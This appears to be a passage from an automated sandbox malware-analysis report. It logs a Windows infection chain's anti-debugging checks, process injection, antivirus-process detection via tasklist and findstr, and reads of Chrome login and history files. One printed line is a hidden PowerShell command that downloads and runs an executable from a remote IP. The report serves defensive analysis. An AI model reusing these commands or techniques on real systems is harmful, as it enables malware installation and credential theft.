Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Code function: 3_2_04E00342 rdtsc 3_2_04E00342
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099F4FF BlockInput, 28_2_0099F4FF
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0092338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 28_2_0092338B
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 11_2_00406328
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009C652B mov eax, dword ptr fs:[00000030h] 10_2_009C652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009CA302 mov eax, dword ptr fs:[00000030h] 10_2_009CA302
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00945058 mov eax, dword ptr fs:[00000030h] 28_2_00945058
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02C1E4CD mov edi, dword ptr fs:[00000030h] 31_2_02C1E4CD
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02C1E64A mov edi, dword ptr fs:[00000030h] 31_2_02C1E64A
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 28_2_009820AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00952992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00952992
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00940BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00940BAF
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00940D45 SetUnhandledExceptionFilter, 28_2_00940D45
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00940F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00940F91
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi32_5616.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: mshta.exe PID: 6748, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 1548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 2644, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02C1E4CD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 31_2_02C1E4CD
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Memory written: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00981B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 28_2_00981B4D
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0092338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 28_2_0092338B
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098BBED SendInput,keybd_event, 28_2_0098BBED
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098EC9E mouse_event, 28_2_0098EC9E
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE "C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE"
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe "C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe "C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe "C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe "C:\Users\user\AppData\Local\Temp\1053476001\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1548 -ip 1548
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 952
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 567757
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Activation
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VIETNAM" Diagnostic
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 567757\Appeal.com + Entirely + Thumbnails + Atmospheric + Eternal + Quite + Strictly + Mongolia + Card + Decent 567757\Appeal.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tuner + ..\Rest + ..\Reservation + ..\Twiki j
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Appeal.com j
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 28_2_009814AE
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00981FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 28_2_00981FB0
Source: skotes.exe, skotes.exe, 0000000A.00000002.3557951700.0000000000B80000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: BProgram Manager
Source: Macromedia.com, 00000017.00000003.2806842457.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000017.00000000.2800821872.00000000006D3000.00000002.00000001.01000000.00000010.sdmp, AchillesGuard.com, 0000001C.00000002.3528429627.00000000009E3000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: AchillesGuard.com Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009AD3E2 cpuid 10_2_009AD3E2
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053579001\4db43293bc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053579001\4db43293bc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053662101\1e9cc73e62.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053662101\1e9cc73e62.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053663021\am_no.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053663021\am_no.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053669001\b191a8c87b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053669001\b191a8c87b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053670001\8fb472f3d3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053670001\8fb472f3d3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\fox.zip.enc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0097E5F4 GetLocalTime, 28_2_0097E5F4
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0097E652 GetUserNameW, 28_2_0097E652
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0095BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 28_2_0095BCD2
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 11_2_00406831
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 5.2.skotes.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.skotes.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.skotes.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2266194444.0000000000991000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2273381494.0000000000991000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239022204.0000000000B51000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2198141136.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2677861995.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3554162033.0000000000991000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2232623830.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.ugdKEDU.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.2957620541.0000000000892000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ugdKEDU[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe, type: DROPPED
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.ugdKEDU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.ugdKEDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 1548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 2644, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: AchillesGuard.com Binary or memory string: WIN_81
Source: AchillesGuard.com Binary or memory string: WIN_XP
